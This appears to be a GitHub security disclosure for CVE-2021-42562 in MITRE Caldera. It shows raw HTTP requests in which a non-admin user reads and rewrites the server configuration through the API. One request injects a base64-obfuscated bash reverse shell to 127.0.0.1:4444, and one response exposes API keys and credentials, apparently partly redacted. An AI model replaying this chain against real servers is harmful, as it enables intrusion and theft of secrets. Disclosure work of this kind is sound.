Skip to content
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Disclosures/CVE-2021-42562-Improper Access Control-MITRE Caldera/
Disclosures/CVE-2021-42562-Improper Access Control-MITRE Caldera/

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 
 
 

CVE-2021-42562: Improper Access Control in MITRE Caldera

Caldera (versions <=2.8.1) does not properly segregate user privileges, resulting in non-admin users having access to read and modify configuration or other components which should only be accessible by admin users.

Software:

The MITRE Caldera software can be found here.

Requirements:

This vulnerability requires:

  • Valid user credentials

Proof Of Concept:

For this scenario we will login as the non-admin user "blue". As can be seen in the image below, blue does not have access to the "Configuration" tab, but by using direct API requests, we are still able to read and modify the configurations.

Login Request:

POST /enter HTTP/1.1
Host: 192.168.243.180:8888
Content-Type: application/x-www-form-urlencoded
Content-Length: 66

username=blue&password=po***TRUNCATED***5Y

Login Response:

HTTP/1.1 302 Found
Content-Type: text/plain; charset=utf-8
Location: /
Content-Length: 10
Set-Cookie: API_SESSION="gAAAAABfk0kpIYcoemLUYUktkN886YjTcnC2BIAVrwSOPBuEpIxsFCaBPXLFw0UqlmoiC_2BkrGfBNAgojCLDd_JB7qmq49lOHf_3OemdECrQvsT2draejz9AiGAua1iZMz96iITQoniNpfmh7hDQkoI2omNN3QYiwa3cM9BbP1BLB6tqsfRG4M="; HttpOnly; Path=/
Date: Fri, 23 Oct 2020 21:20:41 GMT
Server: Python/3.6 aiohttp/3.6.2
Connection: close

302: Found

Config request via API using blue's session cookie:

POST /api/rest HTTP/1.1
Host: 192.168.243.180:8888
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 313
Origin: http://192.168.243.180:8888
Connection: close
Referer: http://192.168.243.180:8888/
Cookie: API_SESSION="gAAAAABfk0kpIYcoemLUYUktkN886YjTcnC2BIAVrwSOPBuEpIxsFCaBPXLFw0UqlmoiC_2BkrGfBNAgojCLDd_JB7qmq49lOHf_3OemdECrQvsT2draejz9AiGAua1iZMz96iITQoniNpfmh7hDQkoI2omNN3QYiwa3cM9BbP1BLB6tqsfRG4M="

{"index":"configuration","prop":"requirements","value":{"go": {"command": "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}", "type": "installed_program", "version": "I'm blue"}, "python": {"attr": "version", "module": "sys", "type": "python_module", "version": "3.6.1"}}}

Response:

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
Content-Length: 1103
Date: Fri, 23 Oct 2020 21:22:31 GMT
Server: Python/3.6 aiohttp/3.6.2
Connection: close

{"ability_refresh": 60, "api_key_blue": "aH***TRUNCATED***TU", "api_key_red": "Qv***TRUNCATED***M4", "app.contact.gist": "API_KEY", "app.contact.http": "http://0.0.0.0:8888", "app.contact.tcp": "0.0.0.0:7010", "app.contact.udp": "0.0.0.0:7011", "app.contact.websocket": "0.0.0.0:7012", "crypt_salt": "yz***TRUNCATED***Hw", "encryption_key": "0C***TRUNCATED***lw", "exfil_dir": "/tmp", "host": "0.0.0.0", "plugins": ["access", "atomic", "compass", "debrief", "fieldmanual", "gameboard", "manx", "response", "sandcat", "stockpile", "training", "/tmp/hexor"], "port": 8888, "reports_dir": "/tmp", "requirements": {"go": {"command": "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}", "type": "installed_program", "version": "I'm blue"}, "python": {"attr": "version", "module": "sys", "type": "python_module", "version": "3.6.1"}}, "users": {"blue": {"blue": "po***TRUNCATED***5Y"}, "red": {"red": "mS***TRUNCATED***mM"}}}

Note: As it can be seen in the above request, this vulnerability allows a non-admin user to leverage CVE-2021-42559: Command Injection Via Configurations.